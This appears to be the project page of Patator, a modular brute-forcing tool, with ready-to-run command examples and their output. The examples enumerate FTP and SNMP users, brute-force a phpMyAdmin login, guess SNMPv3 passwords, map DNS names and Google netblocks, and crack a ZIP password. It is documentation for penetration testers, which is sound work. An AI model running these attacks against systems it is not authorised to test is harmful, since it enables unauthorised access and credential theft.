My favorites | Sign in
Project Home Downloads Wiki Issues Source
Summary   People
Project Information
Members
Links
 

Patator is a multi-purpose brute-forcer, with a modular design and a flexible usage.
Currently it supports the following modules:
 * ftp_login     : Brute-force FTP
 * ssh_login     : Brute-force SSH
 * telnet_login  : Brute-force Telnet
 * smtp_login    : Brute-force SMTP
 * smtp_vrfy     : Enumerate valid users using the SMTP VRFY command
 * smtp_rcpt     : Enumerate valid users using the SMTP RCPT TO command
 * http_fuzz     : Brute-force HTTP/HTTPS
 * pop_passd     : Brute-force poppassd (not POP3)
 * ldap_login    : Brute-force LDAP
 * smb_login     : Brute-force SMB
 * mssql_login   : Brute-force MSSQL
 * oracle_login  : Brute-force Oracle
 * mysql_login   : Brute-force MySQL
 * pgsql_login   : Brute-force PostgreSQL
 * vnc_login     : Brute-force VNC
 * dns_forward   : Forward lookup subdomains
 * dns_reverse   : Reverse lookup subnets
 * snmp_login    : Brute-force SNMPv1/2 and SNMPv3
 * unzip_pass    : Brute-force the password of encrypted ZIP files
 * keystore_pass : Brute-force the password of Java keystore files
 
The name "Patator" comes from http://www.youtube.com/watch?v=xoBkBvnTTjo 
Patator is NOT script-kiddie friendly, please read the README inside patator.py before reporting.
  • FTP : Enumerate valid logins on a too verbose server 
 $ patator.py ftp_login host=10.0.0.1 user=FILE0 password=qsdf 0=logins.txt -x ignore,reset,retry:code=500 -x reset:code=230 -x ignore:mesg='Login incorrect.'
 22:27:29 patator    INFO - Starting Patator v0.2
 22:27:29 patator    INFO - ---------------------------------------------------------------
 22:27:29 patator    INFO - code & size     | candidate                   |   num | mesg ..
 22:27:29 patator    INFO - ---------------------------------------------------------------
 22:27:30 patator    INFO - 530 18          | root                        |     1 | Permission denied.
 22:27:31 patator    INFO - 230 17          | ftp                         |    13 | Login successful.
 22:27:34 patator    INFO - 530 18          | admin                       |    23 | Permission denied.
 22:27:34 patator    INFO - 530 18          | oracle                      |    31 | Permission denied.
 22:28:02 patator    INFO - 530 18          | test                        |   179 | Permission denied.
 22:28:21 patator    INFO - 230 17          | anonymous                   |   283 | Login successful.
 22:28:26 patator    INFO - 530 18          | ftpuser                     |   357 | Permission denied.
 22:28:41 patator    INFO - 530 18          | nobody                      |   402 | Permission denied.
 ...
  • HTTP : Brute-force phpMyAdmin logon 
 $ http_fuzz url=http://10.0.0.1/phpmyadmin/index.php method=POST body='pma_username=COMBO00&pma_password=COMBO01&server=1&lang=en' 0=combos.txt follow=1 accept_cookie=1 -x ignore:fgrep='Cannot log in to the MySQL server' -l /tmp/qsdf
 10:55:50 patator    INFO - Starting Patator v0.2
 10:55:50 patator    INFO - ---------------------------------------------------------------
 10:55:50 patator    INFO - code & size     | candidate                   |   num | mesg ..
 10:55:50 patator    INFO - ---------------------------------------------------------------
 10:55:50 patator    INFO - 200 8209:7075   | root:                       |    22 | HTTP/1.1 200 OK
 10:55:51 patator    INFO - 200 3838:2566   | root:p@ssw0rd               |    44 | HTTP/1.1 200 OK
 ^C
 10:55:52 patator    INFO - Hits/Done/Size/Fail: 2/125/2342/0, Avg: 47 r/s, Time: 0h 0m 2s
 10:55:52 patator    INFO - To resume execution, pass --resume 12,13,12,13,12,12,13,13,13,12
Payload #22 was a false positive: 
 $ cat /tmp/qsdf/22_200_8209\:7075.txt
 ...
 <div class="error">Login without a password is forbidden by configuration (see AllowNoPassword)</div>
  • SNMPv3 : Find valid usernames 
 $ snmp_login host=10.0.0.1 version=3 user=FILE0 0=logins.txt -x ignore:mesg=unknownUserName
 17:51:06 patator    INFO - Starting Patator v0.2
 17:51:06 patator    INFO - ---------------------------------------------------------------
 17:51:06 patator    INFO - code & size     | candidate                   |   num | mesg ..
 17:51:06 patator    INFO - ---------------------------------------------------------------
 17:51:11 patator    INFO - 0-0 11          | robert                      |    55 | wrongDigest
 17:51:12 patator    INFO - Progress:  20% (70/345) | Speed: 10 r/s | ETC: 17:51:38 (00:00:26 remaining)
 17:51:33 patator    INFO - 0-0 11          | myuser                      |   311 | wrongDigest
 17:51:36 patator    INFO - Hits/Done/Size/Fail: 2/345/345/0, Avg: 11 r/s, Time: 0h 0m 30s

  • SNMPv3 : Find valid passwords 

 $ snmp_login host=10.0.0.1 version=3 user=robert auth_key=FILE0 0=passwords_8+.txt -x ignore:mesg=wrongDigest
 17:52:15 patator    INFO - Starting Patator v0.2
 17:52:15 patator    INFO - ---------------------------------------------------------------
 17:52:15 patator    INFO - code & size     | candidate                   |   num | mesg ..
 17:52:15 patator    INFO - ---------------------------------------------------------------
 17:52:16 patator    INFO - 0-0 69          | password123                 |    16 | Linux thug 2.6.36-gentoo #5 SMP Fri Aug 12 14:49:51 CEST 2011 i686
 17:52:17 patator    INFO - Hits/Done/Size/Fail: 1/50/50/0, Avg: 38 r/s, Time: 0h 0m 1s
  • DNS : Forward lookup 
 $ dns_forward domain=FILE0.hsc.fr 0=names.txt -x ignore:code=3
 10:53:20 patator    INFO - Starting Patator v0.2
 10:53:20 patator    INFO - ---------------------------------------------------------------
 10:53:20 patator    INFO - code & size     | candidate                   |   num | mesg ..
 10:53:20 patator    INFO - ---------------------------------------------------------------
 10:53:20 patator    INFO - 0 35            | www                         |     4 | NOERROR www.hsc.fr / 217.174.211.25
 10:53:20 patator    INFO - 0 51            | mail                        |    32 | NOERROR itesec.hsc.fr / 192.70.106.33 / mail.hsc.fr
 10:53:21 patator    INFO - 0 8             | test                        |    54 | NOERROR 
 10:53:21 patator    INFO - 0 34            | wap                         |    66 | NOERROR wap.hsc.fr / 192.70.106.33
 10:53:21 patator    INFO - 0 38            | webmail                     |    62 | NOERROR webmail.hsc.fr / 192.70.106.95
 10:53:21 patator    INFO - 0 51            | news                        |   114 | NOERROR itesec.hsc.fr / 192.70.106.33 / news.hsc.fr
 10:53:22 patator    INFO - 0 61            | mailhost                    |   137 | NOERROR mailhost.hsc.fr / 2001:7a8:1155:2::abcd 192.70.106.33
 10:53:22 patator    INFO - 0 55            | extranet                    |   131 | NOERROR itesec.hsc.fr / 192.70.106.33 / extranet.hsc.fr
 Hostmap ------------------------------------------
                    mailhost.hsc.fr 2001:7a8:1155:2::abcd
                    mailhost.hsc.fr 192.70.106.33
                         wap.hsc.fr 192.70.106.33
                      itesec.hsc.fr 192.70.106.33
                    extranet.hsc.fr .
                        mail.hsc.fr .
                        news.hsc.fr .
                     webmail.hsc.fr 192.70.106.95
                         www.hsc.fr 217.174.211.25
 Domains ------------------------------------------
                             hsc.fr 6
 Networks -----------------------------------------
                             2001:7a8:1155:2::abcd
                                      192.70.106.x
                                    217.174.211.25
 10:53:34 patator    INFO - Hits/Done/Size/Fail: 8/300/300/0, Avg: 21 r/s, Time: 0h 0m 14s
 
 Also notice that test.hsc.fr. is the start of a new zone because we got NOERROR and no IP address.

  • DNS : Reverse lookup two netblocks owned by Google 

 $ dns_reverse host=NET0 0=216.239.32.0-216.239.47.255,8.8.8.0/24 -x ignore:code=3 -x ignore:fgrep!=google.com -x ignore:fgrep=216-239-
 10:52:17 patator    INFO - Starting Patator v0.2
 10:52:17 patator    INFO - ---------------------------------------------------------------
 10:52:17 patator    INFO - code & size     | candidate                   |   num | mesg ..
 10:52:17 patator    INFO - ---------------------------------------------------------------
 10:52:18 patator    INFO - 0 22            | 216.239.32.10               |    11 | NOERROR ns1.google.com
 10:52:18 patator    INFO - 0 21            | 216.239.32.11               |    12 | NOERROR ns.google.com
 10:52:18 patator    INFO - 0 24            | 216.239.32.15               |    16 | NOERROR time1.google.com
 10:52:18 patator    INFO - 0 27            | 216.239.33.17               |   274 | NOERROR smtp-out.google.com
 10:52:18 patator    INFO - 0 23            | 216.239.33.12               |   269 | NOERROR dns1.google.com
 10:52:18 patator    INFO - 0 24            | 216.239.33.5                |   262 | NOERROR proxy.google.com
 10:52:18 patator    INFO - 0 28            | 216.239.33.18               |   275 | NOERROR smtp-out3.google.com
 10:52:18 patator    INFO - 0 24            | 216.239.33.28               |   285 | NOERROR smtp8.google.com
 10:52:18 patator    INFO - 0 26            | 216.239.33.20               |   277 | NOERROR esc-out.google.com
 10:52:18 patator    INFO - 0 27            | 216.239.33.22               |   279 | NOERROR transfer.google.com
 10:52:19 patator    INFO - 0 22            | 216.239.34.10               |   523 | NOERROR ns2.google.com
 10:52:19 patator    INFO - 0 24            | 216.239.34.15               |   528 | NOERROR time2.google.com
 ^C
 Hostmap ------------------------------------------
                     ns1.google.com 216.239.32.10
                      ns.google.com 216.239.32.11
                   time1.google.com 216.239.32.15
                   proxy.google.com 216.239.33.5
                    dns1.google.com 216.239.33.12
                smtp-out.google.com 216.239.33.17
               smtp-out3.google.com 216.239.33.18
                 esc-out.google.com 216.239.33.20
                transfer.google.com 216.239.33.22
                   smtp8.google.com 216.239.33.28
                     ns2.google.com 216.239.34.10
                   time2.google.com 216.239.34.15
 Domains ------------------------------------------
                         google.com 12
 Networks -----------------------------------------
                                      216.239.32.x
                                      216.239.33.x
                                      216.239.34.x
 10:52:20 patator    INFO - Hits/Done/Size/Fail: 12/664/4352/0, Avg: 238 r/s, Time: 0h 0m 2s
 10:52:20 patator    INFO - To resume execution, pass --resume 67,74,68,66,63,69,54,64,69,70
  • ZIP : Crack a password-protected ZIP file (older pkzip encryption used not to be supported in JtR) 
 $ unzip_pass zipfile=challenge1.zip password=FILE0 0=rockyou.dic -x ignore:code!=0 
 10:54:29 patator    INFO - Starting Patator v0.2
 10:54:29 patator    INFO - ---------------------------------------------------------------
 10:54:29 patator    INFO - code & size     | candidate                   |   num | mesg ..
 10:54:29 patator    INFO - ---------------------------------------------------------------
 10:54:30 patator    INFO - 0 82            | love                        |   387 | 0 [82] No errors detected in compressed data of challenge1.zip.
 ^C
 10:54:31 patator    INFO - Hits/Done/Size/Fail: 1/1589/5000/0, Avg: 699 r/s, Time: 0h 0m 2s
 10:54:31 patator    INFO - To resume execution, pass --resume 166,164,165,166,155,158,148,158,155,154

Powered by Google Project Hosting